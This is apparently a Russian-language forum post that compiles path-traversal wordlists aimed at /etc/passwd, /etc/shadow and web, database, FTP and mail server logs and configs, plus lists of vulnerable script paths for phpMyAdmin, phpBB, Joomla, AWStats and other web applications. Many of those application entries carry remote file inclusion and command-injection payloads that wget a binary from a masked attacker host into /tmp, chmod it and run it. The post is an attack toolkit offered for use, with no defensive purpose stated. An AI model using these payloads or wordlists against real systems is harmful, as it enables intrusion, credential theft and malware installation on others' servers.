Код:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Apache
Код:
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../apache2/logs/error.log
../apache2/logs/access.log
../../apache2/logs/error.log
../../apache2/logs/access.log
../../../apache2/logs/error.log
../../../apache2/logs/access.log
../../../../apache2/logs/error.log
../../../../apache2/logs/access.log
../../../../../apache2/logs/error.log
../../../../../apache2/logs/access.log
../logs/error.log
../logs/access.log
../../logs/error.log
../../logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/access.log
../../../../../../../../../../var/log/error_log
../../../../../../../../../../var/log/error.log
../../../../../../../../../../opt/lampp/logs/access_log
../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../opt/xampp/logs/access_log
../../../../../../../../../../opt/xampp/logs/error_log
../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../opt/xampp/logs/access.log
../../../../../../../../../../opt/xampp/logs/error.log
../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log
../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log
conf
Код:
../../../../../../usr/local/apache/conf/httpd.conf
../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/apache/conf/httpd.conf
../../../../../../usr/local/etc/apache/conf/httpd.conf
../../../../../../etc/apache2/httpd.conf
../../../../../../../../../usr/local/apache/conf/httpd.conf
../../../../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../../../usr/local/apache/httpd.conf
../../../../../../../../usr/local/apache2/httpd.conf
../../../../../../../../usr/local/httpd/conf/httpd.conf
../../../../../../../usr/local/etc/apache/conf/httpd.conf
../../../../../../../usr/local/etc/apache2/conf/httpd.conf
../../../../../../../usr/local/etc/httpd/conf/httpd.conf
../../../../../../../usr/apache2/conf/httpd.conf
../../../../../../../usr/apache/conf/httpd.conf
../../../../../../../usr/local/apps/apache2/conf/httpd.conf
../../../../../../../usr/local/apps/apache/conf/httpd.conf
../../../../../../etc/apache/conf/httpd.conf
../../../../../../etc/apache2/conf/httpd.conf
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/http/conf/httpd.conf
../../../../../../etc/apache2/httpd.conf
../../../../../../etc/httpd/httpd.conf
../../../../../../etc/http/httpd.conf
../../../../../../etc/httpd.conf
../../../../../opt/apache/conf/httpd.conf
../../../../../opt/apache2/conf/httpd.conf
../../../../var/www/conf/httpd.conf
../../../private/etc/httpd/httpd.conf
../../../private/etc/httpd/httpd.conf.default
../../Volumes/webBackup/opt/apache2/conf/httpd.conf
../../Volumes/webBackup/private/etc/httpd/httpd.conf
../../Volumes/webBackup/private/etc/httpd/httpd.conf.default
../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf
../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf
../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf
../../../../../../../../../usr/local/php/httpd.conf.php
../../../../../../../../../usr/local/php4/httpd.conf.php
../../../../../../../../../usr/local/php5/httpd.conf.php
../../../../../../../../../usr/local/php/httpd.conf
../../../../../../../../../usr/local/php4/httpd.conf
../../../../../../../../../usr/local/php5/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/usr/local/etc/apache/vhosts.conf
php.ini
Код:
../../../../../../../../../etc/php.ini
../../../../../../../../../bin/php.ini
../../../../../../../../../etc/httpd/php.ini
../../../../../../../../../usr/lib/php.ini
../../../../../../../../../usr/lib/php/php.ini
../../../../../../../../../usr/local/etc/php.ini
../../../../../../../../../usr/local/lib/php.ini
../../../../../../../../../usr/local/php/lib/php.ini
../../../../../../../../../usr/local/php4/lib/php.ini
../../../../../../../../../usr/local/php5/lib/php.ini
../../../../../../../../../usr/local/apache/conf/php.ini
../../../../../../../../../etc/php4.4/fcgi/php.ini
../../../../../../../../../etc/php4/apache/php.ini
../../../../../../../../../etc/php4/apache2/php.ini
../../../../../../../../../etc/php5/apache/php.ini
../../../../../../../../../etc/php5/apache2/php.ini
../../../../../../../../../etc/php/php.ini
../../../../../../../../../etc/php/php4/php.ini
../../../../../../../../../etc/php/apache/php.ini
../../../../../../../../../etc/php/apache2/php.ini
../../../../../../../../../web/conf/php.ini
../../../../../../../../../usr/local/Zend/etc/php.ini
../../../../../../../../../opt/xampp/etc/php.ini
../../../../../../../../../var/local/www/conf/php.ini
../../../../../../../../../etc/php/cgi/php.ini
../../../../../../../../../etc/php4/cgi/php.ini
../../../../../../../../../etc/php5/cgi/php.ini
../../../../../../../../../php5\php.ini
../../../../../../../../../php4\php.ini
../../../../../../../../../php\php.ini
../../../../../../../../../PHP\php.ini
../../../../../../../../../WINDOWS\php.ini
../../../../../../../../../WINNT\php.ini
../../../../../../../../../apache\php\php.ini
../../../../../../../../../xampp\apache\bin\php.ini
../../../../../../../../../NetServer\bin\stable\apache\php.ini
../../../../../../../../../home2\bin\stable\apache\php.ini
../../../../../../../../../home\bin\stable\apache\php.ini
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
Cpanel:
*log
Код:
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
*conf
/var/cpanel/cpanel.config
MySQL:
*log
Код:
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
*conf
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf
MySQL(Windows):
log + conf
Код:
C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
C:\Program Files\MySQL\data\hostname.err
C:\Program Files\MySQL\data\mysql.log
C:\Program Files\MySQL\data\mysql.err
C:\Program Files\MySQL\data\mysql-bin.log
C:\MySQL\data\hostname.err
C:\MySQL\data\mysql.log
C:\MySQL\data\mysql.err
C:\MySQL\data\mysql-bin.log
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\my.cnf
C:\MySQL\my.ini
C:\MySQL\my.cnf
FTP
Код:
[U]ProFTPD: [/U]
*log
/etc/logrotate.d/proftpd
/www/logs/proftpd.system.log
/var/log/proftpd
*conf
/etc/proftp.conf
/etc/protpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/proftpd/modules.conf
[U]
vsftpd: [/U]
*log
/var/log/vsftpd.log
/etc/vsftpd.chroot_list
/etc/logrotate.d/vsftpd.log
*conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd.conf
/etc/chrootUsers
[U]wu-ftpd: [/U]
*log
/var/log/xferlog
/var/adm/log/xferlog
*conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
[U]Pure-FTPd: [/U]
*conf
/usr/sbin/pure-config.pl
/usr/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/etc/pure-ftpd.conf
-/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pure-ftpd/pureftpd.pdb
DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/
OpenBSD: /usr/ports/net/pure-ftpd/
NetBSD: /usr/pkgsrc/net/pureftpd/
Crux Linux: /usr/ports/contrib/pure-ftpd/
*log
/var/log/pure-ftpd/pure-ftpd.log
/logs/pure-ftpd.log
/var/log/pureftpd.log
[U]Other: [/U]
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy
/var/log/ftplog
/etc/logrotate.d/ftp
/etc/ftpchroot
/etc/ftphosts
Mail Server
Код:
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/maillog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_rejectlog
Добавлено через 16 часов 1 минуту
PHPMyAdmin
Код:
Target
PHPMyAdmin
Files Requested
/PMA/main.php
/admin/main.php
/admin/mysql/main.php
/admin/phpmyadmin/main.php
/admin/pma/main.php
/db/main.php
/dbadmin/main.php
/main.php
/myadmin/main.php
/mysql-admin/main.php
/mysql/main.php
/mysqladmin/main.php
/phpMyAdmin-2.2.3/main.php
/phpMyAdmin-2.2.6/main.php
/phpMyAdmin-2.5.1/main.php
/phpMyAdmin-2.5.4/main.php
/phpMyAdmin-2.5.6/main.php
/phpmyadmin/main.php
/phpmyadmin2/main.php
/web/phpMyAdmin/main.php
/PMA/read_dump.php
/db/read_dump.php
/dbadmin/read_dump.phpv /myadmin/read_dump.php
/mysql/read_dump.php
/mysqladmin/read_dump.php
/phpMyAdmin%202.6.4-pl4/read_dump.php
/phpMyAdmin%202.7.0-beta1/read_dump.php
/phpMyAdmin%202.7.0-pl1/read_dump.php
/phpMyAdmin%202.7.0-rc1/read_dump.php
/phpMyAdmin%202.7.0/read_dump.php
/phpMyAdmin-2.2.3/read_dump.php
/phpMyAdmin-2.2.7-pl1/read_dump.php
/phpMyAdmin-2.5.6/read_dump.php
/phpMyAdmin-2.5.7-pl1/read_dump.php
/phpMyAdmin-2.6.0-pl3/read_dump.php
/phpMyAdmin-2.6.0/read_dump.php
/phpMyAdmin-2.6.1-pl3/read_dump.php
/phpMyAdmin-2.6.3-pl1/read_dump.php
/phpMyAdmin-2.6.4/read_dump.php
/phpadmin/read_dump.php
/phpmyadmin/read_dump.php
/phpmyadmin1/read_dump.php
/phpmyadmin2/read_dump.php
/typo3/phpmyadmin/read_dump.php
/web/phpMyAdmin/read_dump.php
/xampp/phpmyadmin/read_dump.php
Некоторые PHP скрипты
Код:
/DE/index2.php
/FR/index2.php
/NL/index2.php
/US/index2.php
/cms/index.php
/cms/index2.php
/cvs/index.php
/cvs/index2.php
/index.php
/index2.php
/mambo/index.php
/mambo/index2.php
/mb/index.php
/mb/index2.php
/site/index2.php
/v1/index2.php
/v2/index2.php
/v3/index2.php
phpBB
Код:
/modules/Forums/admin/admin_styles.php
/Forums/admin/admin_styles.php
/includes/functions.php
/includes/functions_nomoketos_rules.php
/modules/Forums/admin/admin_mass_email.php
/modules/Forums/admin/index.php
phpbb_root_path=http://XXX.XXX.XX.XX/cmd.dat?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|
Coppermine
Код:
Target
Coppermine
Files Requested
/modules/coppermine/themes/default/theme.php
Payload
THEME_DIR=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|
Mambo/Joomla Content Management System
Код:
/index.php
/index2.php
/mambo/index2.php
/cvs/index2.php
/cvs/mambo/index2.php
/php/mambo/index2.php
/cbcms/mod_cbsms_messages.php
/components/com_extcalendar/admin_events.php
/components/com_forum/download.php
/components/com_galleria/galleria.html.php
/components/com_hashcash/server.php
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/components/com_loudmounth/includes/abbc/abbc.class.php
/components/com_pcchess/include.pcchess.php
/components/com_pccookbook/pccookbook.php
/components/com_performs/performs.php
/components/com_pollxt/conf.pollxt.php
/components/com_rsgallery2/rsgallery.html.php
/components/com_smf/smf.php
/components/com_simpleboard/file_upload.php
/components/com_sitemap/sitemap.xml.php
/components/com_videodb/core/videodb.class.xml.php
/mod_cbsms_messages.php
Payload
_REQUEST[option]=com_content
_REQUEST[Itemid]=1
GLOBALS=
mosConfig_absolute_path=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
CONFIG_EXT[LANGUAGES_DIR]=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
Wordpress, Drupal и другие...
Код:
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
AWStats
Код:
/awstats/awstats.pl
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl
Payload
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20XX X%2eXXX%2eXX%2eXX%2fmirela%3bchmod%20%2bx%20mirela %3b%2e%2fmirela;echo%20YYY;echo|
Microsoft Applications/Extensions
Код:
/5c/_vti_bin/owssvr.dll
/5c/MSOffice/cltreq.asp
Payload
UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
DBImageGallery
Код:
/admin/attributes.php
/admin/images.php
/admin/scan.php
/includes/attributes.php
/includes/db_utils.php
/includes/images.php
/includes/utils.php
/includes/values.php
Payload
donsimg_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
DBGuestbook
Код:
/includes/guestbook.php
/includes/utils.php
/includes/views.php
Payload
dbs_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Ultimate Fun Book
Код:
/board//function.php
/funboard/function.php
/function.php
Payload
gbpfad=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Sinapis Forum CMS
Код:
/sinapis.php
/forum//sinapis.php
/FO/sinapis.php
Payload
fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Admin Phorum
Код:
PhpForums Admin Phorum
Files Requested
/actions/del.php
Payload
include_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
PMB Services
Код:
/cnl_prod/pmb/opac_css/includes/resa_func.inc.php
/pmb/opac_css/includes/resa_func.inc.php
/opac_css/includes/resa_func.inc.php
Payload
class_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
PHP-MIP
Код:
/php/top.php
/phpmip//top.php
/top.php
Payload
laypath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
SendStudio
Код:
Files Requested
/sendstudio/admin/includes/createemails.inc.php
/sendstudio/admin/includes/send_emails.inc.php
Payload
ROOTDIR=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/